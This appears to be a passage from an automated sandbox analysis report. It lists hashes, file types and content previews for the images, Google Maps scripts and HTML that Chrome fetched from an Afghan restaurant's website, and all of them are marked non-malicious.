                                                                                                                                                    Preview:.PNG........IHDR...U...c.......L.....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:ASCII text, with very long lines (802)
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):3308
                                                                                                                                                    Entropy (8bit):5.5083394341383904
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:48:fHKvPwII+sSQx+GzETrVdA6wcA411GbwIkBpCN63K91jJahGIdL2wl+nsIEGbR4t:fAwzx/5YTrVdB17I+puX7jECwljI1P2L
                                                                                                                                                    MD5:2334D2C9424FC203B6672293A25994E8
                                                                                                                                                    SHA1:D4CEFB27836F8BE576CC45C9BB0F5BA3AD281E52
                                                                                                                                                    SHA-256:CE8FDEE05819227CE1A5EEC4B1B59B68599B26A414F5CA5343BFF490D4A6ED56
                                                                                                                                                    SHA-512:11AC863540AB8EFD442986151E3CE798EE53FDC13C03F369380D5D37DE2D3405A1502AF88CD98BAC81E0ABE62B65B11F25F9DEFEDA94645D8B2995AB4A338D71
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:google.maps.__gjsload__('geometry', function(_){var zsa=function(a,b){return Math.abs(_.fj(b-a,-180,180))},Asa=function(a,b,c,d,e){if(!d){c=zsa(a.lng(),c)/zsa(a.lng(),b.lng());if(!e)return e=Math.sin(_.Di(a.lat())),e=Math.log((1+e)/(1-e))/2,b=Math.sin(_.Di(b.lat())),_.Ei(2*Math.atan(Math.exp(e+c*(Math.log((1+b)/(1-b))/2-e)))-Math.PI/2);a=e.fromLatLngToPoint(a);b=e.fromLatLngToPoint(b);return e.fromPointToLatLng(new _.al(a.x+c*(b.x-a.x),a.y+c*(b.y-a.y))).lat()}e=_.Di(a.lat());a=_.Di(a.lng());d=_.Di(b.lat());b=_.Di(b.lng());c=_.Di(c);return _.fj(_.Ei(Math.atan2(Math.sin(e)*.Math.cos(d)*Math.sin(c-b)-Math.sin(d)*Math.cos(e)*Math.sin(c-a),Math.cos(e)*Math.cos(d)*Math.sin(a-b))),-90,90)},Bsa=function(a,b){a=new _.Mj(a,!1);b=new _.Mj(b,!1);return a.equals(b)},Csa=function(a,b){const c=[];let d=[0,0],e;for(let f=0,g=_.Yi(a);f<g;++f)e=b?b(a[f]):a[f],rA.tE(e[0]-d[0],c),rA.tE(e[1]-d[1],c),d=e;return c.join("")},sA={containsLocation:function(a,b){a=_.Rj(a);const c=_.fj(a.lng(),-180,180),d=!!b.get
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:HTML document, Unicode text, UTF-8 text, with very long lines (2649)
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):3656
                                                                                                                                                    Entropy (8bit):5.553445324902549
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:yMDJXyBCLtbPNkesM8D0XN2hpKKP8DW7/8dJ4x6xWxUCvL02:ygJiBTesbDcN2hpr8DS/8ddMLR
                                                                                                                                                    MD5:8A0C5F8ED000C3A75421A8C05D658F42
                                                                                                                                                    SHA1:72F2A0E89260F9D19DCBD1BBE117A1DEB114C410
                                                                                                                                                    SHA-256:76AB104B1D57D854260CD81EF264FFFE07EE1146CE1D9D8D8CA84BBF3AEC22B4
                                                                                                                                                    SHA-512:700F4905E6F21DE410DF35C8727D532BC5D59272ABC8246A6AEABFE26E81FCB236A75FFE9C1DED43B9462E7C132DAEE7D1C62D67618DA798773814F4A8B728C0
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.google.com/maps/embed?pb=!1m18!1m12!1m3!1d3144.533724303754!2d145.20973321518076!3d-37.988009579721194!2m3!1f0!2f0!3f0!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x6ad61409ac52d843%3A0xb215f2f86d8cc962!2sAfghan%20Rahimi%20Restaurant!5e0!3m2!1sen!2slk!4v1658071830116!5m2!1sen!2slk
                                                                                                                                                    Preview:<!DOCTYPE html>.<html>. <head>. <style type="text/css">. html, body, #mapDiv {. height: 100%;. margin: 0;. padding: 0;. }. </style>. </head>. <body>. <div id="mapDiv"></div>. . <script nonce="13A7h58UMN79ziKXoHT1BQ">. function onEmbedLoad() {. initEmbed([null,null,null,null,null,[[[2,"spotlit",null,null,null,null,null,[null,null,null,null,null,null,null,null,null,null,11,null,[null,null,null,null,null,null,null,null,null,null,null,null,null,1]]]],null,null,[[null,null,null,null,null,null,null,null,null,null,null,null,null,[[["7698362644814813251","12832429862065850722"],"/g/1pv1dr17w",null,[3915087207,1452119189],null,null,null,null,null,null,null,null,null,null,"gcid:afghani_restaurant"],0,0,null,null,0,null,0]]]],null,["en","lk"],[null,null,null,"/maps/api/js/ApplicationService.GetEntityDetails","/maps/embed/upgrade204",null,"/maps/embed/record204"],null,null,null,null,null,null,null,null,"FXr7ZoDPLs-H9u8Ppa_VwQg",null,nu
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 64 x 45, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):17355
                                                                                                                                                    Entropy (8bit):2.8128135406405907
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:96:SSdb8kEWm+3UxNX7sc56PQR0jz5NsKVc7fND1LJWywhl:SSKk6h0QuHrG7fND1JSl
                                                                                                                                                    MD5:699D1E50392F1CA41CD7BAE266B617EF
                                                                                                                                                    SHA1:ED9D6195059F3606CF0A97D99B7AB21F74A92BD0
                                                                                                                                                    SHA-256:EE98BF1343D09633B12426AE8AA84E7762FB396301715ECA00CC3B32821C0B19
                                                                                                                                                    SHA-512:823C20AFF5FB3C456769058A6CF187A50DE045351B1C51E1B0131A1275117636BFAEE6364664A2420ABADF295B599FF872735FDF721C93748F5B30E59711034C
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...@...-.......mZ....pHYs...............;jiTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stRef="http://ns.adobe.com/xap/1.0/sType/ResourceRef#". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2022-07-17T17:36:24+05:30</xmp:CreateDate>. <
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 94 x 100, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):20691
                                                                                                                                                    Entropy (8bit):4.000849221230036
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:192:VktxJOfnk82zxPZ7RpjucX/8NO5d7A33M:mtxu2F9ju0/lTAs
                                                                                                                                                    MD5:59B641D34196B35FF0DEE310B35594B8
                                                                                                                                                    SHA1:8E7C233205DE55F526C848C8C7FC264FB1359F38
                                                                                                                                                    SHA-256:15956B3055CF55300316A60C607ABDD2A009EDBE54C65B39A1AD9CADC8250645
                                                                                                                                                    SHA-512:A7DAFE9224BC4B03C9646C8BEDDBFEDDF3251AA8040E22727B8AE78A155BED3F2289B513F7408C2AA43030C9106DBA2C7943D876309EC90BD898CF2B0B091529
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...^...d......3......pHYs...t...t..f.x..9.iTXtXML:com.adobe.xmp.....<?xpacket begin="." id="W5M0MpCehiHzreSzNTczkc9d"?>.<x:xmpmeta xmlns:x="adobe:ns:meta/" x:xmptk="Adobe XMP Core 5.6-c111 79.158325, 2015/09/10-01:10:20 ">. <rdf:RDF xmlns:rdf="http://www.w3.org/1999/02/22-rdf-syntax-ns#">. <rdf:Description rdf:about="". xmlns:xmp="http://ns.adobe.com/xap/1.0/". xmlns:dc="http://purl.org/dc/elements/1.1/". xmlns:photoshop="http://ns.adobe.com/photoshop/1.0/". xmlns:xmpMM="http://ns.adobe.com/xap/1.0/mm/". xmlns:stEvt="http://ns.adobe.com/xap/1.0/sType/ResourceEvent#". xmlns:tiff="http://ns.adobe.com/tiff/1.0/". xmlns:exif="http://ns.adobe.com/exif/1.0/">. <xmp:CreatorTool>Adobe Photoshop CC 2015 (Windows)</xmp:CreatorTool>. <xmp:CreateDate>2022-07-17T16:28:15+05:30</xmp:CreateDate>. <xmp:ModifyDate>2022-07-17T16:44:35+05:30</xmp:ModifyDate>. <xmp:M
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:HTML document, ASCII text, with very long lines (7389), with CRLF, LF line terminators
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):21465
                                                                                                                                                    Entropy (8bit):5.214614077410543
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:384:gYv9vxQdKzprW352OAYQ1dTzLBrrobv75fld1qmSF2/s:Vv9JQdK852zYQ1dTztrrobv75fld1qmA
                                                                                                                                                    MD5:6274280CFD019963CADE047324C18427
                                                                                                                                                    SHA1:EBB7628E6F0D55725F3FD44112D830CC14BBB886
                                                                                                                                                    SHA-256:1A39D9B6711334340A254E50433681AEAB4D9807E1ED2EFD9425C6683994C4C3
                                                                                                                                                    SHA-512:868BC3099CFD2F4FC1A351D8FB15C1741BE56DC44FD5F477E7701287AE93F47EF14F92A4CFA82270B160DA7B52FA312E634F53683E2ACA335C9BF4D217CA1279
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/
                                                                                                                                                    Preview:<!DOCTYPE html>..<html lang="en">..<head>...<meta charset="utf-8">.. <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">.. <meta name="author" content="AdagraPro">.. <title>Afghan Hayat Restaurant</title>.. <link rel="shortcut icon" type="image/x-icon" href="favicon.ico" />.... font icons -->.. <link rel="stylesheet" href="assets/vendors/themify-icons/css/themify-icons.css">.. <link rel="stylesheet" href="assets/vendors/animate/animate.css">.... Bootstrap + FoodHut main styles -->...<link rel="stylesheet" href="assets/css/foodhut.css">.. <link rel="stylesheet" href="assets/css/custom.css">.... Google font styles -->.. <link rel="preconnect" href="https://fonts.googleapis.com">.. <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>.. <link href="https://fonts.googleapis.com/css2?family=Dancing+Script:wght@500;600;700&family=Edu+TAS+Beginner&family=Mochiy+Pop+One&family=Pacifico&displ
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JSON data
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):3
                                                                                                                                                    Entropy (8bit):1.584962500721156
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3:P:P
                                                                                                                                                    MD5:8A80554C91D9FCA8ACB82F023DE02F11
                                                                                                                                                    SHA1:5F36B2EA290645EE34D943220A14B54EE5EA5BE5
                                                                                                                                                    SHA-256:CA3D163BAB055381827226140568F3BEF7EAAC187CEBD76878E0B63E9E442356
                                                                                                                                                    SHA-512:CA4B6DEFB8ADCC010050BC8B1BB8F8092C4928B8A0FBA32146ABCFB256E4D91672F88CA2CDF6210E754E5B8AC5E23FB023806CCD749AC8B701F79A691F03C87A
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://maps.googleapis.com/maps/api/mapsjs/gen_204?csp_test=true
                                                                                                                                                    Preview:{}.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=1024, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=768], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):55111
                                                                                                                                                    Entropy (8bit):7.81478196799974
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:kUFhNUFhGCBLRZkFCbgoAynZNJj0Uo1KkgT:kUFhNUFh9LRZb/AynZjfv
                                                                                                                                                    MD5:F65CCF316CEE2CC9C8DCA8F35FE75158
                                                                                                                                                    SHA1:AC02D0F8D7EBCD3E49EA6D2D98342978D5AEC9C0
                                                                                                                                                    SHA-256:5229A3298872C67377774C2F086A0FBCF6A3FA5546F104B2B79E95C5DC93A117
                                                                                                                                                    SHA-512:07A7C13A012DF17F7AB54D5DC1EB66424D4CA08C7FDB182E910616C69BA8B32FE061187B43FFB72DF9FDB34D45AD91D90BDD359B495804DC19F74165947705B2
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:......Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:12:28 00:05:14.............0221...................................................................r...........z.(.........................................H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?....fe....SWV.;+t5........jWf.....F..3.......]WL...K2:..X73...G....#.+...@*
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=949, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1227], progressive, precision 8, 328x910, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):76671
                                                                                                                                                    Entropy (8bit):7.882869668722342
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:usvwfco95svwfco9LLJ+ZMz0IcQ9V18zMJ1YEIzUIS+HhNeAr5nZtEG8ENl:usIfPjsIfPN8aQI3ozMJIzVS+BNeAlEM
                                                                                                                                                    MD5:459A65E6124932AFD38DC00C467CFDD7
                                                                                                                                                    SHA1:8B68A6459D5401E2957DCE5A9546E5F02D5F2A26
                                                                                                                                                    SHA-256:0509E48B56C81136DC11A2620BD748D31EBAABB41505AEBB210168851AB004EA
                                                                                                                                                    SHA-512:ED6B076DC25D19CE45D2F0DE9A9732D828C5042ADFDBEF071DBA8547AA3F9DF60E4FFE7E32678787357D7D0D107D0A4E575243F1D8B0A85705104F589C346BFB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:......Exif..MM.*.......................................................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:27 17:00:26.............0221.......................H...........................................r...........z.(.................................&.......H.......H..........Adobe_CM......Adobe.d...................................................................................................................................................:.."................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..OK...:..C.Bv=..Wjj.0....*.....e.}..2......!.{.%..s[u.....o.}d..I.^..^.
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 117 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):38109
                                                                                                                                                    Entropy (8bit):5.952437309555736
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:NcdDiMXU59dPTJS1+TBfugJ/+rLRyT80gT/:qYdIITBntyRyg0gT/
                                                                                                                                                    MD5:FE4EB42CFFCF904772EB27B7D4D140D6
                                                                                                                                                    SHA1:9E149381873454D6F4CFEB643ABD5F1823088173
                                                                                                                                                    SHA-256:5E5C8509C42BC39861D6E5CBA9A08F3A9F6B69E623FD81E9F45BF6F8ECF92700
                                                                                                                                                    SHA-512:9319141AF079BFA8A977DEE16A0E07FE6AE83B57D2F287491243B9E5A8DEFE04DA74F29F215F13EE6B69182F912A2735D082FAA791ED8860A9F892578713D9A4
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/menu_imges/Rice_with_Dhal.png
                                                                                                                                                    Preview:.PNG........IHDR...u...K.....Nt.a....pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=862, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1284], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):115418
                                                                                                                                                    Entropy (8bit):7.9321681222709985
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:MY8AarvY8Aar89Ze6v1rBkyOUSaTtytlo3QT+:X2w283PfkyOMktW3Q6
                                                                                                                                                    MD5:DA8E7F6025CFF61338E147288F5B9FA8
                                                                                                                                                    SHA1:5CC4029EC01921B2BBA6D654458F1F15F0D6CA28
                                                                                                                                                    SHA-256:511D4BB7516D9DBCB28AFFBE19DE92C98D5CD4BBEC63F4D5601F6F3524F3525C
                                                                                                                                                    SHA-512:CE5B67B403DCC9081C9CDE51EEFC0889CAF9778B580A3E0A9C0E9FB135B3F93A6624DE61695E2E6A0C2AB53350A2A74EE2BC350BEE71F67ECD5D8CB095A37DDB
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:..../JExif..MM.*...........................^...........................................................................(...........1.....".....2..........i.............$............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:22 19:32:27.............0221...................................................................r...........z.(................................-........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?...L..d.e.p...O.sl..87.W.....d...X$..ikD.n.%.......sk$..s...>...B...z...
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=13, height=1068, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 700x700, components 3
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):158797
                                                                                                                                                    Entropy (8bit):7.9448218302132165
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:9N6OiN6OPKP8VjiZMwBfJPMCHFDo9mJsiBi76jfJXgyPAr4GTCcuDHezph:9N6OiN6OhVjC/P3to98FBi769XgfMgC4
                                                                                                                                                    MD5:B2CE0BAEC8FA0884BDF35F900DB13052
                                                                                                                                                    SHA1:28EF0CCE4901C2C1A562C5D6A1FF8AC9ABF6A175
                                                                                                                                                    SHA-256:73C4BE64554E6B0178A2E8A532FA19DBDA88D65DAD0ED61BCDA2C89D6FD8CB6A
                                                                                                                                                    SHA-512:EE5F369CCA9BD970B777D102A79AD6B9838C65F8BF022538BF19943D67203D295C793A2F37C62584AE445C2BBA1E097DA38785CE9372B0E67A36C20E3E49D609
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://www.afghanhayatrestaurant.com.au/assets/imgs/gallery/gallary-m-9.jpg
                                                                                                                                                    Preview:....1.Exif..MM.*...............@...........,...........................................................................(...........1.....".....2.......................i.............T............'.......'.Adobe Photoshop CC 2015 (Windows).2022:07:26 22:25:27.............0221....................0100.............................................................................................(................................/........H.......H..........Adobe_CM......Adobe.d......................................................................................................................................................"................?..........................................................................3......!.1.AQa."q.2.....B#$.R.b34r..C.%.S...cs5....&D.TdE.t6..U.e...u..F'...............Vfv........7GWgw........................5.....!1..AQaq"..2.....B#.R..3$b.r..CS.cs4.%......&5..D.T..dEU6te....u..F...............Vfv........'7GWgw.................?..3...U.X.;4..t!V.C~.."A.|..
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 632 x 500, 8-bit colormap, non-interlaced
                                                                                                                                                    Category:downloaded
                                                                                                                                                    Size (bytes):65859
                                                                                                                                                    Entropy (8bit):7.983320196316593
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:1536:CRbjlM3oYHYsSuJ5HHSVcPzkS3KQilJvBZgAi:CjW3oWYsSiVHSEl3bIsAi
                                                                                                                                                    MD5:17DD20B97F7EB742B0BD212CB8340EF0
                                                                                                                                                    SHA1:6B92213E550CFE20F0F5EF22096706EFFA2449FC
                                                                                                                                                    SHA-256:D4DD37BCAE455A0F75EB45143A676A53F66B3A69515D6ECA88648030726F0A55
                                                                                                                                                    SHA-512:17F97B7DD1241A4C81D8B908952A81868CFD2CDD1A85CDAE2C67AA2C1E6F716AE201C732281A88C76574B970F92BA87EF311C8484EC72E294DDADCF04693FF10
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    URL:https://maps.googleapis.com/maps/api/js/StaticMapService.GetMapImage?1m2&1i15155658&2i10304804&2e1&3u16&4m2&1u632&2u500&5m6&1e0&5sen&6slk&10b1&12b1&14i47083502&client=google-maps-embed&token=68106
                                                                                                                                                    Preview:.PNG........IHDR...x...........6....PLTE&7T;QbDVmPavTnzpuz.r..s.8x.)|...._w.y~..._..s6.s...7..$..P..s..|..x.....p..w..|..E..Q..W..~..u..Y..d..n .x0.;..).._..H...?..&.^..A.n..................................................................................................................................................................................................................................................!.......bKGD....D.. .IDATx...W..... .....}.xlzz.%.X.D..6!IiS.(.."...uy."0...gf.....=30.sE.v}..........g)...~Z.CDUvss.'....(.....>.[...P...T8.I..s...."......p.P......R1...j%.L&.N.8Q@(....&...H.Px......_...K...\.^!..=ow.L$..]t/w.X...ew.g........+...g*.?..]..G...F;..?..d....Cy.K....&lF.#.....RW....X...3..X..o_H-p......y..W+.~.......?.g..*..n.O.L...JnO........Q.>..;....x'.l. =._........-...CI.}]^....SB.P8(.j...<.W+T.q...U.Y.>!.k..&......O..!j?...+=y.....K.x..z.O..>!@.N...........<.we.^.....(I....F6#.........4`.W.hR>.q..q..#R..r
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:PNG image data, 87 x 75, 8-bit/color RGBA, non-interlaced
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):37903
                                                                                                                                                    Entropy (8bit):5.933755200420351
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:768:0vdDi9/U5p0HYY1QVcJh/cZXuhwsmDEcDG:E7yYY+AhwuhFB
                                                                                                                                                    MD5:9361873A04E8A3E2574F083656AF61CE
                                                                                                                                                    SHA1:30E4F9A7559322ACC6BC5399E9C371EC28B2A748
                                                                                                                                                    SHA-256:E72945AA887DD8A681AE2675482715B70D66394F6F43638BAAA8CC2A8A3124A6
                                                                                                                                                    SHA-512:0CFA6A37AC9B47764292D90E5149B3945BDB47532B949BF9DA365D8AC3CE1756FA4204678CAF3558264D47022FF06E69FD89234EC7FFD2D1FA3F37645BE83F1B
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:.PNG........IHDR...W...K.............pHYs................MiCCPPhotoshop ICC profile..x.SwX...>..e.VB..l.."#....Y....a...@...V....HU...H...(.gA..Z.U\8....}z...........y.....&..j.9R.<:...OH.....H.. ....g......yx~t.?...o...p..$......P&W. ...".....R...T.......S.d.....ly|B"......I>................(G$.@..`U.R,......@"......Y.2G.....v.X..@`...B,.. 8..C.... L..0.._p..H.....K.3.....w....!..l.Ba.).f.."...#.H..L.........8?......f.l....k.o">!.........N..._....p...u.k.[..V.h..]3...Z..z..y8.@...P.<......%b..0.>.3.o..~..@...z..q.@......qanv.R....B1n..#.....)..4.\,...X..P"M.y.R.D!.....2......w....O.N....l.~.....X.v.@~.-......g42y.......@+..........\...L....D..*.A..............a.D@.$.<.B.......A.T.:.............18....\..p..`........A...a!:..b.."......"aH4... ..Q"..r...Bj.]H#.-r.9.\@.... 2....G1...Q...u@......s.t4.]...k....=.....K.ut.}..c..1.f..a\..E`.X.&..c.X5V.5c.X7v....a..$......^...l...GXLXC.%.#....W...1.'"..O.%z...xb:..XF.&.!.!.%^'.._.H$...N.!%.2I.IkH.H-.S.>..i.L&.m.......
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=17, height=4000, bps=0, PhotometricIntepretation=RGB, manufacturer=Canon, model=Canon EOS 200D II, orientation=upper-left, width=6000], baseline, precision 8, 900x900, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):142133
                                                                                                                                                    Entropy (8bit):7.918517530333488
                                                                                                                                                    Encrypted:false
                                                                                                                                                    SSDEEP:3072:TVmnVm2CXEXhSc5Yu6F8WZ2q7YCdvKtM9Da/uqO7:ZuXXQcWp81CdvKt8EuR
                                                                                                                                                    MD5:4609E9B0A726D1206CD05619AA0A6352
                                                                                                                                                    SHA1:2FC1B1DA5EB5EDE41570CD5E268B3F7D809E7682
                                                                                                                                                    SHA-256:E8AF7D8F8C439618E35F3E0016F7611EFBC683C92563D47CA84E4EA2484CD4C9
                                                                                                                                                    SHA-512:57F01855748750EE2F86C99E256C55ACB653FD852CE096E8107BF5B7C25C640FD2BE8E4D56D6748C5EFCF01EDFCA646855E6D09314752D7E648D909E31FEA5C9
                                                                                                                                                    Malicious:false
                                                                                                                                                    Reputation:low
                                                                                                                                                    Preview:....)DExif..MM.*...............p...............................................................................................................(...........1.....".....2.........*.........................i.........@.%.........,...@......Canon.Canon EOS 200D II.......'.......'.Adobe Photoshop CC 2015 (Windows).2023:09:29 18:42:44....)...........2...........:."...........'.......@...0...........2.........@........0231...........B...........V...........j...........q...........x........................................................................................................86..........86..........86..........0100.....................................................................................................................................0...........1...........2..........4..........5.................................d...8....2023:08:19 15:27:56.2023:08:19 15:27:56.+10:00.+10:00.+10:00............................%.................................................................
                                                                                                                                                    Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                    File Type:JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=12, height=700, bps=0, PhotometricIntepretation=RGB, orientation=upper-left, width=1600], progressive, precision 8, 1600x700, components 3
                                                                                                                                                    Category:dropped
                                                                                                                                                    Size (bytes):165416
